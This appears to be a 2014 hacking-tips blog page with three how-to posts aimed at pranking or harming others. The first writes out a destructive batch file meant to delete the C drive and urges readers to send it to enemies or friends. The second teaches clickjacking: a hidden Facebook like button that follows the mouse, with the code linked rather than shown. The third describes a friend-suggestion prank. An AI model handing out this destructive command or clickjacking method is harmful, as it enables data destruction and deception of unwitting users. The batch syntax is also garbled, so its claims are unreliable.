Posts

Showing posts from November 23, 2014

HOW: Batch Virus (Simple)

Image
Hey blogger!         Today we will be making a VIRUS!. This time we will make a simple batch file that totally reformat your Drive C. Well it is where commonly we install our operating system. So good bye computer hehehe. Just follow the simple steps below. Note: Don't try executing the code on your own PC, maybe to a friends computer hehehehe.. STEP 1: We open Note Pad. STEP 2: Copy and paste this code:   @Echo off  Del C:\ *.* |y  STEP 3: Save it as Filename.bat. And WALAH! your done. you may now try sending this code to a enemy or a friend. Good luck :D NOTE: I am not responsible for any damage, Its your choice. I only suggest hehehe :D - byruz

HOW: Click Jacking For Likes (FB)

Image
Hey blogger!      Have you ever experience being trick for clicking something that leads you to like a certain facebook page? Maybe yes.. Click jacking is very popular today increase facebook fan page traffic. today i will show you how to make a click jacking page. STEP 1: We create the main page for our click jacking. Save it as  .HTML file  . STEP 2: We add the j query script below on the head part of you HTML. Click Here: http://pastebin.com/c7hzqknr STEP 3: Now we add the second code, - This code will make the like button follow your mouse, anywhere in the page. So when the user click anywhere from the page it generates the like. Click Here: http://pastebin.com/Npk3QjUH NOTE:  Dont forget to change   Replace Your facebook fanpageurl Whit your own fan page url . STEP 4:  SAVE, and upload your page to any free hosting page, Note:  this code is also applicable to blogger. Just go to Layout - Edit html...

HOW: Suggest Friends To Themselves (FB)

Image
Hey Blogger! It's been a while since I posted in my blog :) I have been busy for the last few months or year hahaha, But today I will teach you how to suggest friends to themselves in facebook. This is an old trick but really effective prank for your friends. NOTE: This trick will not hack your friends facebook account! Step 1:  We go to this link. And we change USERNAME to our victims user name - https://graph.facebook.com/ USERNAME So in my case it's byruzhacker, So we replace the USERNAME part of the link. ex: https://graph.facebook.com/ byruzhacker - Now we go to the link that we have created, and user information will be shown. Note: Take note of the id! in this case its 100000002855346. We will be needing that later. STEP 2: Now we will go to victims page, And suggest friends. - After hitting suggest friends a list of your friends will be shown. STEP 3: Now the geeky part, We now right click on anywhere  and select Ins...